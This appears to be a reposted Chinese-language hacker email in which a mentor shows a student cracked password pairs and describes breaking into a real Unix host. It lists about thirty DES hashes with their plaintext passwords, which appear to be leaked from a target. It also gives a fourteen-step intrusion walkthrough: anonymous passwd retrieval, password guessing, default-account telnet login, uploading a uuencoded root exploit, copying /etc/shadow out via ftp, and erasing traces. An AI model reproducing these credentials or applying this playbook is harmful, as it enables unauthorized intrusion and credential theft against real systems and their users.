iamin:

你好!很感謝你給我回信,我沒有給你吃什麼糖衣炮彈,我只是說說我想說的!對了上上次你給我
的PASSWD和SHADOW我試著JOHN破了一 下!你看看這些是我們大家都需要的真正的密碼(不是SHOW過的):

6VG.amxoiWm6A:11

fdkVARBHm05VU:88888888
yXfsMS5dJUwbg:LEE
zN88EuBr.oCJw:YNSZF
a19LYYMRIEQ2A:KYJW
t1Tb0nnMm8mL2:HHZX
92hjNOWOwRX9s:YXJW
AmipTt7Mc.j9k:oakland
i9GDAwGfRuKcQ:kmbwzx
o3F3QNeJtID/g:tips
4G8p2S59mZq36:TJG
mdBHk/vuaMfEc:sxj
4nmA0M3eMD8AE:lwh
wdXINZH83Ss8k:njzxxzx
HeWB4TYZhL2qs:dlzxxzx
LljHx2OToJm/g:test
HhiFXJTtf5KYw:jwnjc
LvAEzLDKCyTnQ:dhzxxzx
GHUPKbrfHOgwA:ynmyt
auDa1aGa6j1yA:smjw
DnFYlA1zLPE8A:oakland
vSHp9hQOh3.T2:wsjw
eOfgJae0l1zaA:wzb
SPgzbeQrgmy/2:lrj
hefd6TV7m8yDk:bsdjxxzx
eyhgReGBBboKg:morris12
ofR.RfNeM25TM:fgk97
g4B3RkHrrJw9g:hyb123
ONIeS8c4h89B.:www123
---------------------------------------------------------

破解是正確的,但...我再說明一次吧...

lwh:x:109:1:SE Engineer:/home/lwh:/usr/bin/sh
| | | |  | | |--用戶的shell為 sh
|  | | |   |     |-----用戶目錄
| | | | |---用戶全名或其他情況
| | | |----用戶組id號
| | |----用戶id號
| |--代表密碼被shadow,加密後的密碼自動在shadow文件中匹配.
|------用戶賬號

shadow中對應用戶lwh的記錄:
lwh:4nmA0M3eMD8AE:9973:0:168:7::10956:
| |---用DES方法加密後生成的13位加密碼.(即對原密碼lwh加密後的結果)
|---於passwd文件對應的賬號lwh.

破解完後,用命令
john -show aaa
可以看到用戶名和密碼的對應關係,john的說明中都寫了的!
因此你可以知道
lwh用戶的密碼和它的賬號一樣,為lwh,而不是4nmA0M3eMD8AE
以上的知識在coolfire和root的john1.5使用說明都寫過的...
先認真讀讀...好嗎?
學習黑客要講個"悟"字...情況是千變萬化的,沒有很固定的方法,
黑客的各個步驟都可能用不同的方法來達成...
如果要詳細的寫,我可以寫出幾萬字..所以我只能個你提示,希望你能自己來嘗試和領悟,
只要有一定的基礎,我所寫的就是關鍵之處..一看就明白了...

1.get passwd (我沒有用你寄來的passwd文件,僅僅匿名就得到了,這是一個漏洞!)


2.用emailcrk猜了一會...拿到了幾十個密碼(又是漏洞!)..但都是ftponly的shell,不能telnet


3.打開passwd文件觀察為sh.csh之類shell的用戶,發現有幾個很可能是默認賬號..


4.telnet 到目標,試到第二個賬號就有了一個shell.(漏洞)


5.這個賬號居然連ls都不能用?--原來它沒設搜索路徑,用/bin/ls 就可以了.( /bin/命令)


6.系統為sun os 5.6,不能cc/gcc,只好上傳編譯好的expoilts,但這個賬號又不能ftp?


7.在jiangfy的主頁上有telnet上傳的方法,把編譯好的expoilt uuencode後傳上去.


8. /bin/uudecode myfile ; /bin/chmod +x myfile 解開我的expoilt


9運行 myfile


10 .哈哈,看看提示符為 # ,(未補的漏洞),趕快 more /etc/shadow.但shadow有幾百K...


11. cp /etc/shadow /tmp/myshadow 拷貝一個到/tmp目錄.chmod a+r myshadow (讓任何人可讀)


12.再開一個窗口,用另一個賬號ftp上,get myshadow 回來


13.get完後刪除myshadow和myfile,打掃戰場,bye了.


14.expoilt 可到www.rootshell.com 自己找到後編譯,注意對應的unix系統和版本號.
-----------------------------------------------------------------------------------------------
老師"越來越忙了,家裡也越來越"窮"了,.以後長的mail沒時間回了,好在你不愁沒人教的:)
.
但是希望你能自己多想多試,不能急於求成,這樣收穫才比較大.有機會netmeting,這樣一次能交流的信息比較多.

Bye...
------To my friends...----
==========================
| ** Do you forget ... **|
==========================
--the mail is from iamin--

---------------------------------------------------------------------------------------------------

    全站熱搜

    Neo Chao 發表在 痞客邦 留言(0) 人氣()